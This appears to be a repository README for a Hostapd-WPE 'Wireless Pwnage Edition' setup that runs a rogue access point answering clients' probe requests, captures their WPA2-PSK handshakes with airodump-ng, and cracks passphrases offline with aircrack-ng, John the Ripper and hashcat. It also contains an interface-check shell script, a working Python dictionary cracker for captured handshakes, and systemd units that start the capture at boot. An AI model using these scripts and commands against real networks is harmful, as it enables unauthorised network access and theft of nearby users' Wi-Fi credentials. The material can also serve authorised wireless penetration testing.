
Wireless Pwnage Edition

What does this do and how does it work?

This setup makes use of Hostapd-WPE (Wireless Pwnage Edition), a modified version of the standard hostapd (Host Access Point Daemon). It sets up a rogue access point that mimics legitimate Wi-Fi networks, tricks clients into connecting to it, and captures the authentication material the clients send during their connection attempts.

Modern wireless clients (laptops, smartphones, tablets) try to maintain seamless connectivity by continuously probing for the Wi-Fi networks in their saved list. While not connected to Wi-Fi, a device periodically sends probe requests asking whether any of its previously used networks is available, so that it can reconnect automatically when a familiar network is in range, without user intervention. Combined with a tool like Hostapd-WPE, this behaviour can be used to make clients in range connect to the rogue AP. Even though the authentication fails from the client's point of view, the attempted handshake can be monitored and the authentication material it contains recorded.

This works because hostapd-WPE can be configured to answer every probe request with a probe response, making the client believe the requested SSID is in range.

Many clients, depending on their security settings, will then automatically try to connect to the AP, believing it to be the legitimate network.

The captured authentication attempts can then be used for offline password cracking. For WPA/WPA2-PSK networks the client's reply in the 4-way handshake already carries a MIC computed with a key derived from the pre-shared key, the two MAC addresses and the two nonces, so a candidate passphrase can be verified against the capture without the client ever completing the handshake.

Note: This method only works against networks that use WPA or WPA2. WPA3 replaces the pre-shared-key handshake with SAE, which is designed so that a captured exchange cannot be used for offline dictionary attacks.

Requirements

The following package needs to be installed for the wpe script to work

  • hostapd-wpe

For the mon script the "airodump-ng" executable is required, which is part of the package

  • aircrack-ng

Both scripts rely on the "ip" command which is part of the package

  • iproute2

As hardware prerequisite, the host running the scripts needs two Wi-Fi network cards. One runs Hostapd-WPE and needs to support AP mode; the other monitors the connection attempts and records the authentication handshakes, which requires monitor mode. The modes a Wi-Fi chipset supports are listed under "Supported interface modes" in the output of the command "iw list".

Usage

The script wpe starts the impersonating AP on one interface. The interface is given with the -i option.

sudo ./wpe -i wlan0

The script mon is started simultaneously, while the wpe script is still running. It captures connection attempts and writes them to a capture file. An interface is given with the -i option and it must be a different interface from the one used for the wpe script.

sudo ./mon -i wlan1

Both scripts need the configuration file hostapd-wpe.conf either in the same directory or the default in /etc/hostapd-wpe/.
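Added example, not one of the repository's scripts: a POSIX shell check that the two interfaces meet the hardware requirements above (AP mode for wpe, monitor mode for mon, two separate cards) before the scripts are started. It parses the text of "iw dev" and "iw list" from the variables IW_DEV and IW_LIST, which default to the constructed samples embedded in the script so that it runs offline; the interface names, phy names and mode lists in those samples are made up, as is the script name check_ifaces.sh.

```shell
#!/bin/sh
# Added example (not part of this repository): verify that WPE_IF supports AP
# mode, MON_IF supports monitor mode, and the two sit on different radios.
# Live use: IW_DEV=$(iw dev) IW_LIST=$(iw list) sh check_ifaces.sh wlan0 wlan1

# Constructed sample output, trimmed to the relevant lines (not real hardware).
SAMPLE_IW_DEV='phy#0
    Interface wlan0
        ifindex 3
        type managed
phy#1
    Interface wlan1
        ifindex 4
        type managed'

SAMPLE_IW_LIST='Wiphy phy0
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * AP/VLAN
         * monitor
    Band 1:
Wiphy phy1
    Supported interface modes:
         * managed
         * monitor'

IW_DEV=${IW_DEV:-$SAMPLE_IW_DEV}
IW_LIST=${IW_LIST:-$SAMPLE_IW_LIST}

# phy_of_iface IFACE: print the wiphy (phy0, phy1, ...) owning IFACE, from $IW_DEV.
phy_of_iface() {
    printf '%s\n' "$IW_DEV" | tr '\t' ' ' | awk -v want="$1" '
        /^phy#/ { cur = "phy" substr($1, 5) }
        $1 == "Interface" && $2 == want { print cur; exit }
    '
}

# list_modes PHY: print one supported interface mode per line for PHY, from $IW_LIST.
# Only the "Supported interface modes:" block is read; it ends at the first
# line that is not a " * mode" entry.
list_modes() {
    printf '%s\n' "$IW_LIST" | tr '\t' ' ' | awk -v want="$1" '
        /^Wiphy / { cur = $2 }
        /Supported interface modes:/ { inmodes = (cur == want); next }
        inmodes && /^ *\* / { sub(/^ *\* /, ""); print; next }
        inmodes { inmodes = 0 }
    '
}

# supports_mode PHY MODE: succeed if PHY lists MODE (e.g. AP, monitor).
supports_mode() {
    list_modes "$1" | grep -qx "$2"
}

# check_pair WPE_IF MON_IF: distinct interfaces, distinct radios, right modes.
# Prints the reason to stderr and returns 1 on failure.
check_pair() {
    wpe_if=$1 mon_if=$2
    if [ "$wpe_if" = "$mon_if" ]; then
        echo "wpe and mon must use different interfaces" >&2; return 1
    fi
    wpe_phy=$(phy_of_iface "$wpe_if"); mon_phy=$(phy_of_iface "$mon_if")
    [ -n "$wpe_phy" ] || { echo "$wpe_if: no such wireless interface" >&2; return 1; }
    [ -n "$mon_phy" ] || { echo "$mon_if: no such wireless interface" >&2; return 1; }
    if [ "$wpe_phy" = "$mon_phy" ]; then
        echo "$wpe_if and $mon_if share $wpe_phy; the scripts expect two cards" >&2
        return 1
    fi
    supports_mode "$wpe_phy" AP || { echo "$wpe_if ($wpe_phy) lacks AP mode" >&2; return 1; }
    supports_mode "$mon_phy" monitor || { echo "$mon_if ($mon_phy) lacks monitor mode" >&2; return 1; }
    echo "ok: $wpe_if ($wpe_phy) -> wpe, $mon_if ($mon_phy) -> mon"
}

check_pair "${1:-wlan0}" "${2:-wlan1}"
```

With the embedded samples, wlan0 on phy0 qualifies for wpe and wlan1 on phy1 for mon; swapping them fails because phy1 offers no AP mode.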

Processing a capture file

When monitoring Wi-Fi connections, the captured data is saved to a pcap file. airodump-ng numbers the file by run, appending -01, -02, ... to the output prefix, so the first run yields "wpa*-01.cap".

Various tools can be used to process the captured data, optionally with one of the wordlists which, depending on the host system, are available in the directory /usr/share/wordlists.

Examples:

aircrack-ng with a simple wordlist:

aircrack-ng -w /usr/share/wordlists/wifite.txt wpa*-01.cap

Convert the capture for the use with the tool John the Ripper:

aircrack-ng wpa*-01.cap -J wpa &&
hccap2john wpa.hccap > wpa.john &&
john -w=/usr/share/wordlists/john.lst -form=wpapsk wpa.john

Convert the capture to hashcat's WPA-PBKDF2-PMKID+EAPOL format (hash mode 22000) with hcxpcapngtool from hcxtools. The tool writes this format, not the older hccapx format of the deprecated mode 2500, so the output file is named accordingly:

sudo apt -y install hcxtools &&
hcxpcapngtool -o wpa.22000 wpa*-01.cap &&
hashcat -m 22000 -a 0 wpa.22000 \
/usr/share/wordlists/rockyou.txt.gz
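Added example, not part of this repository or of hostapd-wpe: a small Python implementation of the check that aircrack-ng, john and hashcat perform for a WPA2-PSK capture, showing why the handshake a client starts with the rogue AP (as described under "What does this do") is enough for offline cracking even though the client never completes it. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed test data; a real run would take the nonces, MACs and EAPOL frame from the airodump-ng capture file.

```python
"""Added example: the offline check behind aircrack-ng / john / hashcat for a
WPA2-PSK handshake recorded by mon. Not part of this repository.
The rogue AP chooses ANonce and sends message 1 of the 4-way handshake; the
client answers with message 2 carrying SNonce and a MIC keyed by the KCK, which
is derived from PMK = PBKDF2(passphrase, SSID), both MACs and both nonces.
Everything needed to test a candidate passphrase is therefore in the capture.
SSID, MACs, nonces, wordlist and passphrase below are constructed test data."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # byte offset of the Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1 in counter mode, first 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: first 128 bits of the PTK. aa/spa are AP and client MACs."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def build_message2(snonce: bytes, rsn_ie: bytes, mic: bytes = bytes(16)) -> bytes:
    """EAPOL-Key message 2 (RSN, key descriptor version 2 = HMAC-SHA1-128 MIC)."""
    body = (
        b"\x02"                      # descriptor type: RSN (WPA2)
        + struct.pack(">H", 0x010A)  # key info: version 2, pairwise, MIC present
        + struct.pack(">H", 0)       # key length
        + struct.pack(">Q", 1)       # replay counter
        + snonce                     # key nonce = SNonce
        + bytes(16)                  # key IV
        + bytes(8)                   # key RSC
        + bytes(8)                   # key ID
        + mic                        # key MIC
        + struct.pack(">H", len(rsn_ie)) + rsn_ie
    )
    return b"\x01\x03" + struct.pack(">H", len(body)) + body  # EAPOL v1, type Key


def eapol_mic(kck_key: bytes, frame: bytes) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed (version 2)."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck_key, zeroed, hashlib.sha1).digest()[:16]


def parse_message2(frame: bytes):
    """SNonce and MIC as found in a captured message 2."""
    return frame[17:49], frame[MIC_OFFSET:MIC_OFFSET + 16]


def crack(ssid, aa, spa, anonce, frame, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    snonce, mic = parse_message2(frame)
    for candidate in wordlist:
        k = kck(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(k, frame), mic):
            return candidate
    return None


# Constructed scenario (test data, not a real capture)
SSID = "CorpWifi"
AA = bytes.fromhex("020000000001")     # rogue AP BSSID
SPA = bytes.fromhex("020000000002")    # client MAC
ANONCE = bytes(range(32))              # picked by the rogue AP
SNONCE = bytes(range(32, 64))          # picked by the client
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
TRUE_PASSPHRASE = "wireless pwnage"
WORDLIST = ["password", "letmein", "wireless pwnage", "correct horse"]


def make_capture(passphrase: str = TRUE_PASSPHRASE) -> bytes:
    """What the client would send: message 2 with a MIC under its saved passphrase."""
    k = kck(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return build_message2(SNONCE, RSN_IE, eapol_mic(k, build_message2(SNONCE, RSN_IE)))


if __name__ == "__main__":
    print("recovered passphrase:", crack(SSID, AA, SPA, ANONCE, make_capture(), WORDLIST))
```

The PBKDF2 step is what makes each guess cost 4096 HMAC-SHA1 rounds; the real tools spend their time there, which is why a GPU cracker such as hashcat is used for large wordlists.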

Running via systemd

The systemd unit files can be used to automatically start the corresponding scripts upon system boot.

This setup assumes the repository to be located in the /root directory.

Install the systemd unit files.

sudo cp -v wpe-mon@.service /etc/systemd/system/wpe-mon@.service
sudo cp -v wpe@.service /etc/systemd/system/wpe@.service

Apply the changes.

sudo systemctl daemon-reload

To set the mon script to use the wlan1 interface and start automatically.

sudo systemctl enable wpe-mon@wlan1.service

Alternatively with the wlan2 interface.

sudo systemctl enable wpe-mon@wlan2.service

Similarly for the wpe script, on an interface other than the one given to wpe-mon@ (wlan0 in the usage example above).

sudo systemctl enable wpe@wlan0.service